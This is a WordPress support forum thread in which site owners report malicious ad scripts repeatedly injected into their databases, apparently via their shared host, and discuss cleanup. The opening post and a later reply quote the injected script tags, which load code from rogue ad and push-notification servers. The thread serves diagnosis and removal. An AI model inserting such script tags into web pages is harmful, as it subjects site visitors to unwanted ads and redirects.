Support » Plugin: Anti-Malware Security and Brute-Force Firewall » MW:JS:GEN2?rogueads.unwanted_ads.1

  • Resolved sussexlongman

    (@sussexlongman)


    Hi, I’m having a problem with some malware that is being repeatedly added in front of a Mailchimp form. The script is creating links to external websites upon clicking on navigation links. A sucuri scan picks up the malware but your scanner does not at the moment. This is the Sucuri report:

    Known javascript malware. Details: http://sucuri.net/malware/entry/MW:JS:GEN2?rogueads.unwanted_ads.1
    
    </script><!-- MailChimp for WordPress v4.0.13 - https://wordpress.org/plugins/mailchimp-for-wp/ --><form id="mc4wp-form-1" class="mc4wp-form mc4wp-form-534" method="post" data-id="534" data-name="" ><div class="mc4wp-form-fields"><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script>

    I have removed the inserted code from the Mailchimp form several times which cleans the site but the code returns within a day or two so I presume there is malicious code elsewhere on the site doing this. Any help would be very much appreciated, thanks.

Viewing 15 replies - 16 through 30 (of 30 total)
  • Moderator Jan Dembowski

    (@jdembowski)

    Forum Moderator and Brute Squad

    Side note: These forums work as follows.

    A person has a problem and posts about it. People who can help that person replies with advice. That’s because this topic belongs to the original poster. It’s not the plugin author’s and it’s not the topic of people who think they may have the same problem.

    If you’re not helping the original poster then per the forum welcome please post your own topic. You can do so with this link.

    https://wordpress.org/support/plugin/gotmls/#new-post

    Faced with this problem, I start to solve it. I’ll keep up to date with what I got. I would advise to find the old database backup and restore, as in a database file are so many infected code.

    Plugin Author Eli

    (@scheeeli)

    Hi Jan (@jdembowski),
    I’m not sure why you delete the contributions by Aminul Islam and natepayne. I understand that they also had the same issue but it seemed relevant and helpful that there were all communicating together. That is also how they were able to confirm that they were all using the same hosting. This seems to point directly to the solution since all of them were having the same database injections on the same host and none of them had any back-doors or vulnerabilities on their sites.

    Maybe you don’t want them bad-mouthing their host on your forums so I won’t mention that host’s name here but it is clear to me that it was the hosting provider’s vulnerability on their database server that allowed direct injection of this malicious content and the hast was not being very helpful or forthcoming to their clients. The only solution that seemed to work for the clients/posters was to move to another host. Isn’t it better to have that conversation posted here if it contains the source of the problem and the solution?

    Moderator Jan Dembowski

    (@jdembowski)

    Forum Moderator and Brute Squad

    Nothing is really deleted in these forums and I’ll unarchive those posts.

    This isn’t an invitation to get into a protacted conversation when I write this: let’s keep an eye on the ball and assist the original person with the problem.

    Thanks for reinstating the posts. It has been useful to know that the host is common, and I noticed there is also a Wordfence thread now on the same topic where the same host gets another mention, so that does seem more than a coincidence. Someone there suggests that on their site at least a MySQL search and replace tool was placed in wp-content/upgrade folder to inject ad code into the database. I’m following this up with the host.

    In my case, there was malicious code in all posts. I have removed this for now but am expecting it to come back. Exploit Scanner was the only scan to pick this up.

    Hi, guys,
    any news regarding this?
    have you managed to clean your site or was mowing to another host the only option?
    i was affected too but on another host.

    • This reply was modified 2 years, 4 months ago by  oga23.

    @sussexlongman – how did you clean it?

    I cleaned by myself using mysql query. You can find on stackoverflow.

    is this a code or how do i find it?

    Has anyone found a solution to this issue?

    I am also with TSO Host and my site has also been infected.

    VP

    (@studio500)

    For the benefit of others, I also picked up this malicious script whilst on TSO host.

    Sadly I migrated to a new host and it appears the code came with me.

    TSO Host is definitely linked to this in some way.

    VP

    (@studio500)

    I’m still in process of trying to clean my site.

    @studio500 you have to clean your site before uploading it to the new server to get rid of this problem.

    Hello my website https://bargaincrave.com has this malware
    <script async=”async” type=”text/javascript” src=”//go.mobisla.com/notice.php?p=1361613&interactive=1&pushup=1″></script>
    I tried your plugin but it showed nothing. How can I remove this Sir please help me out

    Plugin Author Eli

    (@scheeeli)

    Check the HTML content in your posts. TSO Host seems to have a really severe issue with hackers injecting Javascript into all their clients’ databases directly.

Viewing 15 replies - 16 through 30 (of 30 total)
  • The topic ‘MW:JS:GEN2?rogueads.unwanted_ads.1’ is closed to new replies.